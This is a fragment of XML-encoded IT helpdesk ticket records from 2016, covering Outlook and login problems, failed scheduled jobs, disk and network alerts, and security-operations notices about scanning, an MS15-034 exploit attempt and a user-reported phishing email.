    <s v="_x000a__x000a_received from: qwijaspo.ukynmfig@gmail.com_x000a__x000a_dear it,_x000a__x000a_here is another report i view often and there have been changes made and they do not reflect my territory.  the report his missing several of my distributors and is off by $700,000 or so._x000a__x000a_please see the screen shot._x000a_[cid:image001.jpg@01d1fada.cc506390]_x000a__x000a_qwijaspo ukynmfig_x000a_sales manager - west coast_x000a_qwijaspo.ukynmfig@gmail.com&lt;mailto:qwijaspo.ukynmfig@gmail.com&gt;_x000a_"/>
    <s v="qwijaspo ukynmfig"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vmax alert:a symmetrix power subsystem ac line interruption was detected.emc sr # 81364438"/>
    <s v="observing these alerts since 5:37 am on 08/20 et_x000d__x000a__x000d__x000a_severity : warning, category: environment, director : df-6d, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000d__x000a_severity : warning, category: environment, director : df-6b, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000d__x000a_severity : warning, category: environment, director : df-5c, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000d__x000a_severity : warning, category: environment, director : df-5a, numerirtc code: 0x001d, event code: ac_line_interrupted, description: a symmetrix power subsystem ac line interruption was detected_x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="user mentioned that the internet gets disconnected once she tries to open the ppt.(home location)"/>
    <s v="user mentioned that the internet gets disconnected once she tries to open the ppt._x000d__x000a_-had the user power cycle the pc and the modem ._x000d__x000a_-user able to conenct to the inter._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-tried to check the network settings, all fine._x000d__x000a_-lost internet connection again.conection stays on for just 5 mins._x000d__x000a_user mentioned that the connection at home is intermittent._x000d__x000a_-conferenced the call with comcas isp._x000d__x000a_-they disconnected the call, were not able to provide support to the user._x000d__x000a_-user mentioned that she will try and connect from a local hotspot._x000d__x000a_-user mentioned she will check the connection again later."/>
    <s v="cqlehowf aosqelnr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_480 failed in job_scheduler at: 08/20/2016 13:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_480 failed in job_scheduler at: 08/20/2016 13:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="space utilization :: e:\ label:dat1-ebhsm004 dc16126c85% space consumed. available: 4.7 g  since 8/20/2016 11:07 am est "/>
    <s v="volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over _x000d__x000a_85% space consumed. space available: 4.7 g "/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="65"/>
  </r>
  <r>
    <s v="HostName_1132:oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="HostName_1132:oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="outlook problems. outlook doesn't start."/>
    <s v="name:uprmwlgb kirvecja_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uprmwlgb.kirvecja@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:outlook problems. outlook doesn't start."/>
    <s v="uprmwlgb kirvecja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not opening in laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vrjwyqtf.qoxkapfw@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_my outlook is not opening in my laptop. can you look into this urgently abd help???_x000d__x000a__x000d__x000a_"/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/20/2016 09:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/20/2016 09:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="security incidents - (#in33655554) : errata security scanning activity"/>
    <s v="=========================_x000a_incident overview_x000a_=========================_x000a_we are seeing your att-singapore-asa.company.com-1/54.96.80.216 device generating denied icmp trafficdenied icmp type=3, code=3 alerts alerts for traffic from port [no entry]/icmp of 209.126.230.71 to port [no entry]/icmp of your / device. these alerts are indicative of possible vulnerability scanning activity sourcing from the errata ip address 209.126.230.71._x000a__x000a_errata has a page where you can request to be excluded from their scanning:_x000a__x000a__x000a_we are escalating this incident to you via a medium priority ticket and no phone call per our defaul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a__x000a_1) full escalation for errata vulnerability scanning activity (explicit notification via a high priority ticket and phone call)_x000a_2) automatically resolve errata vulnerability scanning activity to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000a__x000a_sincerely,_x000a_secureworks soc_x000a__x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_vulnerabilities that may exist across your systems and applications can create a path for cyber attackers to gain access to and exploit your environment. these scans are used to identify and quantify specific security vulnerabilities in your environment, based on a database of known flaws. if sourcing from an unauthorized host, knowledge of your vulnerabilities could later be exploited to potentially interfere with service availability, execute code, or usa an attacker with unauthorized access._x000a__x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 91097767_x000a_event summary: denied icmp trafficdenied icmp type=3, code=3_x000a_occurrence count: 4_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 209.126.230.71_x000a_source hostname: internetsurvey-2.erratasec.com._x000a_source ip geolocation: atlanta, usa_x000a_connection directionality: incoming_x000a_protocol: icmp_x000a__x000a_device information_x000a_device ip: 54.96.80.216_x000a_device name: att-singapore-asa.company.com-1_x000a_log time: 2016-08-20 at 03:49:03 utc_x000a_action: blocked_x000a_cvss score: -1 _x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 756571_x000a_inspector event id: 870599696_x000a_ontology id: 200020003203009212_x000a_event type id: 200020003203009112_x000a_agent id: 103955_x000a__x000a_event detail:_x000a_aug 20 03:49:03 54.96.80.216 %asa-3-313001: denied icmp type=3, code=3 from 209.126.230.71 on interface outside"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_1392 failed in job_scheduler at: 08/20/2016 06:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1392 failed in job_scheduler at: 08/20/2016 06:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1995 failed in job_scheduler at: 08/20/2016 04:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1995 failed in job_scheduler at: 08/20/2016 04:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_2042 failed in job_scheduler at: 08/20/2016 04:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2042 failed in job_scheduler at: 08/20/2016 04:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="lean tracker error - repeated"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_pl. refer the below screen shot of error._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d1fad1.bfbfc520]_x000d__x000a__x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="owa installation in mobile device"/>
    <s v="hi, i'm using personal android mobile phone and would like to use owa outlook on it but access denied/rejected. any one can help?"/>
    <s v="uvjpaeli bnphqsxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abend batch job : Job_1315  "/>
    <s v="abend batch job : Job_1315  "/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job bwhrertran failed in job_scheduler at: 08/20/2016 00:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrertran failed in job_scheduler at: 08/20/2016 00:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is do"/>
    <s v="interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down"/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="extended monitor in the cube 3k-20(nvyjtmca xjhpznds) is not working."/>
    <s v="extended monitor in the cube 3k-20(nvyjtmca xjhpznds) is not working."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 08/19/2016 20:00:50 edt  "/>
    <s v="job Job_3186 failed in job_scheduler at: 08/19/2016 20:00:50 edt  "/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="9"/>
  </r>
  <r>
    <s v="ebhsm004:   volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed"/>
    <s v="ebhsm004:   volume: e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed. space available: 4.6 g"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="monitoring_tool alerts &amp; activity page was not working in between 8:15 pm to 8:27 pm et on 08/19 et"/>
    <s v="monitoring_tool alerts &amp; activity page was not working in between 8:15 pm to 8:27 pm et on 08/19 et. we logged off and logged in to monitoring_tool but the issues was still there.it was just showing as &quot;loading&quot; but nothing was displaying.when we click on my dashbankrd home button no issues it was working fine. only the issue observed with alerts &amp; activity page."/>
    <s v="jloygrwh acvztedi"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job Job_460 failed in job_scheduler at: 08/19/2016 18:23:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_460 failed in job_scheduler at: 08/19/2016 18:23:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to login to company engineering_tool "/>
    <s v="unable to login to company engineering_tool "/>
    <s v="tqvpohwj tbkywpqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms crm app on desktop"/>
    <s v="ms crm app on desktop"/>
    <s v="pytmhcxq cswovnax"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp limited"/>
    <s v="_x000d__x000a__x000d__x000a_received from: liedzaft.lvnbzktj@gmail.com_x000d__x000a__x000d__x000a_when i attempt to view sales data on erp the rows will not go beyond 65536. it was limited to that number with some filters still on. when i removed the filters to show more information it was still limited to 65536 rows. is there a fix to this?_x000d__x000a__x000d__x000a_"/>
    <s v="liedzaft lvnbzktj"/>
    <x v="8"/>
  </r>
  <r>
    <s v="problem with configurator"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_when i try to open the configurator from company center or engineering_tool i get this error. please advise._x000a__x000a_[cid:image001.jpg@01d1fa31.0491caa0]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="china(apac): interface: gigabitethernet0/33 Â· mp-118 on company-ap-chn-china-2960g-access-sw05.company.com is down "/>
    <s v="china(apac): interface: gigabitethernet0/33 Â· mp-118 on company-ap-chn-china-2960g-access-sw05.company.com is down since 02:13pm et on 08/19."/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="3"/>
  </r>
  <r>
    <s v="collaboration_platform query "/>
    <s v="collaboration_platform query "/>
    <s v="pytmhcxq cswovnax"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to engineering_tool"/>
    <s v="access to engineering_tool"/>
    <s v="sjhrytwn yakzbslm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1953d was running longer than 30 minutes kirtyled and rerun"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953d failed in job_scheduler at: 08/19/2016 15:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="47.95.91.3482 - unable to login"/>
    <s v="unable to login to the switch 47.95.91.3482 - company-eu-deu-germany-vhsw02-2900-access-sw02 as the it is experiencing with the memory issue. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="call from external user"/>
    <s v="call from external user"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam"/>
    <s v="_x000a__x000a_received from: qfcxbpht.oiykfzlr@gmail.com_x000a__x000a_bokrgadu euobrlcn,_x000a__x000a_i think this is spam â€¦ fyi._x000a__x000a_               hghtyther_x000a__x000a_from: drop 'box [mailto:pollauridamary1@live.com]_x000a_sent: friday, august 19, 2016 11:34 am_x000a_to: qfcxbpht oiykfzlr_x000a_subject: you have new pdf document (2) --shared via drop'box_x000a__x000a__x000a__x000a_[image removed by sender.]_x000a__x000a__x000a__x000a_dear qfcxbpht.oiykfzlr@gmail.com_x000a__x000a_     a dropbox user sent you some new document through dropbox._x000a_  view! here&lt;_x000a__x000a__x000a_"/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="27"/>
  </r>
  <r>
    <s v="it issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zwirhcol.narzlmfw@gmail.com_x000d__x000a__x000d__x000a_hi we have a computer on the shop floor that will not boot up.  the power button has an orange flashing light.  the only thing i can tell you about the computer is the user name:cobrgtool_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="zwirhcol narzlmfw"/>
    <x v="2"/>
  </r>
  <r>
    <s v="want to check the email if it is spam "/>
    <s v="want to check the email if it is spam "/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="an intern has moved from the markhtyeting group to company. "/>
    <s v="name:callie pollaurid_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xzupryaf.vlbikhsm@gmail.com_x000a_customer number:_x000a_telephone:724_x000a_summary:quick question: an intern has moved from the markhtyeting group to company. who owns her computer and can she take it with her in her new position?"/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: ticket_no1530897 -- comments added"/>
    <s v="_x000a__x000a_received from: afkstcev.utbnkyop@gmail.com_x000a__x000a_i apologize â€“ when i updated the paramdntyeters earlier i failed to look if the right roles were added to the users â€“ they weren't._x000a__x000a_i have now updated the 3 users to mktgen roles:_x000a__x000a_bc:alluser_crm_x000a_bc:basis_view_x000a_it:tcode_crm_ui_x000a_z:erp_crm_uiu_analtyicspro_ui_x000a_z:erp_crm_uiu_framdntyework_x000a_z:erp_crm_uiu_mkt_gen_x000a_z:erp_crm_uiu_sls_all_x000a_z:erp_crm_uiu_srv_gen_x000a__x000a__x000a_afkstcev utbnkyop_x000a_senior analyst, bokrgadu euobrlcn_x000a_afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;_x000a__x000a__x000a_from: kathght shfhyw_x000a_sent: friday, august 19, 2016 2:21 pm_x000a_to: aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&gt;_x000a_cc: company@ticketing_tool.com; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&gt;_x000a_subject: re: ticket_no1530897 -- comments added_x000a__x000a_send updated screenshot please.  if you are logging in from out of the office, please be sure that you are logged into vpn, then try accessing._x000a__x000a_afkstcev utbnkyop_x000a_senior analyst, bokrgadu euobrlcn_x000a_afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;_x000a__x000a_from: aoyrspjv hctgfeal_x000a_sent: friday, august 19, 2016 2:18 pm_x000a_to: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;&gt;_x000a_cc: company@ticketing_tool.com&lt;mailto:company@ticketing_tool.com&gt;; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&lt;mailto:eqxyvfpi.gbaljypo@gmail.com&gt;&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&lt;mailto:riqmdnzs.mtlghwex@gmail.com&gt;&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&lt;mailto:anxmvsor.fdjoawxq@gmail.com&gt;&gt;; aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&lt;mailto:aoyrspjv.hctgfeal@gmail.com&gt;&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&lt;mailto:kxvwsatr.nmywsqrg@gmail.com&gt;&gt;_x000a_subject: fw: ticket_no1530897 -- comments added_x000a__x000a_hi khrtyujuine,_x000a__x000a_would you please help with this problem?_x000a__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: ticket_no1530897 -- comments added"/>
    <s v="_x000a__x000a_received from: afkstcev.utbnkyop@gmail.com_x000a__x000a_send updated screenshot please.  if you are logging in from out of the office, please be sure that you are logged into vpn, then try accessing._x000a__x000a_afkstcev utbnkyop_x000a_senior analyst, bokrgadu euobrlcn_x000a_afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;_x000a__x000a__x000a_from: aoyrspjv hctgfeal_x000a_sent: friday, august 19, 2016 2:18 pm_x000a_to: kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;_x000a_cc: company@ticketing_tool.com; eqxyvfpi gbaljypo &lt;eqxyvfpi.gbaljypo@gmail.com&gt;; riqmdnzs mtlghwex &lt;riqmdnzs.mtlghwex@gmail.com&gt;; gergryth mgndhtillen &lt;anxmvsor.fdjoawxq@gmail.com&gt;; aoyrspjv hctgfeal &lt;aoyrspjv.hctgfeal@gmail.com&gt;; kxvwsatr nmywsqrg &lt;kxvwsatr.nmywsqrg@gmail.com&gt;_x000a_subject: fw: ticket_no1530897 -- comments added_x000a__x000a_hi khrtyujuine,_x000a__x000a_would you please help with this problem?_x000a__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on this ticket_no0428491"/>
    <s v="ticket update on this ticket_no0428491"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for access to crm system "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ntuhoafg.bzwefjvk@gmail.com_x000d__x000a__x000d__x000a_it team,_x000d__x000a__x000d__x000a_please help to enable  access to crm system._x000d__x000a__x000d__x000a_"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="22"/>
  </r>
  <r>
    <s v="distributor_tool entry"/>
    <s v="_x000d__x000a__x000d__x000a_received from: brhlcpqv.sfozwkyx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you help me on entering distributor_tool company with my erp account?_x000d__x000a__x000d__x000a_get outlook for ios&lt;_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="brhlcpqv sfozwkyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="ulhpwzki awhjlbcp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue when updating vv32"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rhwsmefo.tvphyura@gmail.com_x000d__x000a__x000d__x000a_hello.  we are experiencing an issue when updating the following fields in vv32 ; partner and lang.  we have to update this field multiple times before it works in erp.  this is causing problems with customers receiving inwarehouse_tools so please markhty as high priority.  i had to update the record below at least 5 times before the partner and lang saved. "/>
    <s v="rhwsmefo tvphyura"/>
    <x v="12"/>
  </r>
  <r>
    <s v="vip 2 : pls usa access to russ hall to site referenced below"/>
    <s v="vip 2 : pls usa access to russ hall to site referenced below_x000d__x000a__x000d__x000a_the aero collaboration_platform can be found at:_x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a_"/>
    <s v="doxemspb utabejmq"/>
    <x v="15"/>
  </r>
  <r>
    <s v="account lock out and password reset instructions"/>
    <s v="account lock out and password reset instructions"/>
    <s v="ibcsejvn denhyvmr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company email accounts tzrekwqf homwadbs!"/>
    <s v="dear support team,_x000d__x000a__x000d__x000a_can you give me an status about my issue?_x000d__x000a_i must start me work on monday at the company site in fÃ¼rth._x000d__x000a_further is my web access (office 365) not on going._x000d__x000a__x000d__x000a_best "/>
    <s v="tzrekwqf homwadbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't open outlook"/>
    <s v="can't open outlook, same problem twice this week already "/>
    <s v="ufxdkqbc uehvxmfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform on phone does not sync"/>
    <s v="collaboration_platform on phone does not sync"/>
    <s v="xpzsygkb vbualmpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update to office"/>
    <s v="update to office"/>
    <s v="kjeqxayu bpwkdazl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam email queries"/>
    <s v="spam email queries"/>
    <s v="tjlizqgc ngvwoukp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1967c failed in job_scheduler at: 08/19/2016 11:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1967c failed in job_scheduler at: 08/19/2016 11:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="'51551 vid67965 microsoft windows httpsys rce vulnerability exploit attempt (ms15-034 cve-2015-1635) "/>
    <s v="dsw in33568767_x000a__x000a_incident overview_x000a_=========================_x000a_we are seeing '51551 vid67965 microsoft windows httpsys rce vulnerability exploit attempt (ms15-034 cve-2015-1635) - mapp' alerts being generated by your isensplant_247.company.com/208.211.136.207 device indicating that one or more hosts, including 198.8.80.219, are attempting to exploit the microsoft windows http.sys remote code execution vulnerability (cve-2015-1635/ms15-034) on one or more of your internet-facing hosts, including 208.211.136.164/208.211.136.164,. successful exploitation of this vulnerability may result in a denial of service condition or remote code execution on vulnerable systems. _x000a__x000a_we are escalating this incident to you via a high severity/full escalation master ticket for all unblocked events related to this vulnerability (i.e. we are creating a singular ticket for all inbound threats related to this vulnerability). this ticket will effectively serve as a master ticket for any related events until we receive feedback from you on how to handle these events going forward. _x000a__x000a_it should be noted that blocking each source ip address may not necessarily be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate your environment to determine whether you are running a vulnerable version of the application being targeted and ensure that you are running the most recent non-vulnerable version of windows, and that your devices are patched and properly hardened against attacks._x000a__x000a_if you would like these events handled differently, please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at . we have a number of options available for the handling of future alerts such as this one:_x000a_1) autoresolve any events related to attacks against the microsoft windows http.sys kernel driver directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted or if you are running a non-vulnerable version of the application_x000a_2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for attacks against the microsoft windows http.sys kernel driver (this may generate a relatively large volume of incident tickets)_x000a_3) full escalation via a high priority ticket and a phone call for each unique source ip address for attacks against the microsoft windows http.sys kernel driver (this may generate a relatively large volume of incident tickets)"/>
    <s v="afkstcev utbnkyop"/>
    <x v="11"/>
  </r>
  <r>
    <s v="54.96.80.216/att-singapore-asa.company.com-1 device generating at least 253 'internal outbreak for 7/udp' alerts within 10 m"/>
    <s v="dsw in33572131_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 54.96.80.216/att-singapore-asa.company.com-1 device generating at least 253 'internal outbreak for 7/udp' alerts within 10 minutes, for traffic (blocked) from ewll8111148/10.44.23.17 to port 7/udp of several internal hosts. this may indicate unauthorized reconnaissance scanning, a misconfiguration, or authorized internal discovery being blocked by the firewall.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internal reconnaissance alerts (explicit notification via a medium priority ticket (no phone call))_x000d__x000a_2) automatically resolve internal reconnaissance alerts to the portal (no explicit notification but events will be available for reporting purposes in the portal)"/>
    <s v="afkstcev utbnkyop"/>
    <x v="32"/>
  </r>
  <r>
    <s v="18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' aler"/>
    <s v="dsw in33574596_x000d__x000a__x000d__x000a_we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from apul8812210/10.24.12.213 to port 135/tcp (remote procedure call (rpc)) of external host 211.136.113.1.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secureworks soc"/>
    <s v="afkstcev utbnkyop"/>
    <x v="31"/>
  </r>
  <r>
    <s v="18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' aler"/>
    <s v="dsw in33401594_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from rqvl8516442/10.24.15.172 to port 135/tcp (remote procedure call (rpc)) of external host 198.105.254.63.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
    <s v="afkstcev utbnkyop"/>
    <x v="2"/>
  </r>
  <r>
    <s v="114 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/10.16.16."/>
    <s v="dsw in32075851_x000d__x000a__x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we have detected at least 114 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/15.69.85.2812 and destined to port 44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
    <s v="afkstcev utbnkyop"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to load hr_tool etime application "/>
    <s v="_x000a_recently got a new computer and ever since have not been able to load the hr_tool etime application."/>
    <s v="pxwhlnse hjfzvsoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="[hw] filesystem near capacity - h:(HostName_894)"/>
    <s v="dsw in33644259_x000d__x000a__x000d__x000a_related events: _x000d__x000a_event id: 307315976_x000d__x000a_event summary: [hw] filesystem near capacity - h:_x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 18.38.85.961_x000d__x000a_source hostname: HostName_894_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 18.38.85.961_x000d__x000a_device name: HostName_894.company.company.com_x000d__x000a_log time: 2016-08-18 at 18:03:40 utc_x000d__x000a_vendor classification: none_x000d__x000a_vendor priority: 1_x000d__x000a_windows event id: 2013_x000d__x000a_type: warning_x000d__x000a_username: n/a_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 566425_x000d__x000a_inspector rule id: 2132464_x000d__x000a_inspector event id: 030920674_x000d__x000a_agent id: 110620_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_note: by default, this alert is generated when capacity reaches 90%. (_x000d__x000a_aug 18 18:03:40 18.38.85.961 mswineventlog 1 system 2566671 thu aug 18 18:03:40 2016 2013 srv n/a n/a warning HostName_894.company.company.com none  the h: disk is at or near capacity.  you may need to delete some files. 3776"/>
    <s v="afkstcev utbnkyop"/>
    <x v="38"/>
  </r>
  <r>
    <s v="login failure"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jashyht.usa@company.com_x000d__x000a__x000d__x000a_good afternoon,_x000d__x000a_i am unable to open my drive? here is a screen shot of the error: i am unaware of any password as i am able to open up all other drives. i assume it has something to do with an email i received late yesterday (see 2nd screen shot below) which i was unable to login to (see third screen shot):_x000d__x000a_please advise or correct._x000d__x000a_[cid:image002.jpg@01d1fa07.159311d0]_x000d__x000a__x000d__x000a_[cid:image006.jpg@01d1fa07.159311d0]_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image007.jpg@01d1fa07.159311d0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rzvtduoj vsxefcub"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connected the default printer"/>
    <s v="connected the default printer"/>
    <s v="esmvgkhb crybuied"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1315 failed in job_scheduler at: 08/19/2016 10:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1315 failed in job_scheduler at: 08/19/2016 10:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="new prospect accounts within the crm system"/>
    <s v="_x000a_the issue is..._x000a_i have created some new prospect accounts within the crm system_x000a_after 2-3days it still hasn't allocated them a erp ~_x000a__x000a_contact # : _x000a_"/>
    <s v="obanjrhg rnafleys"/>
    <x v="39"/>
  </r>
  <r>
    <s v="call came and got disconnected"/>
    <s v="call came and got disconnected"/>
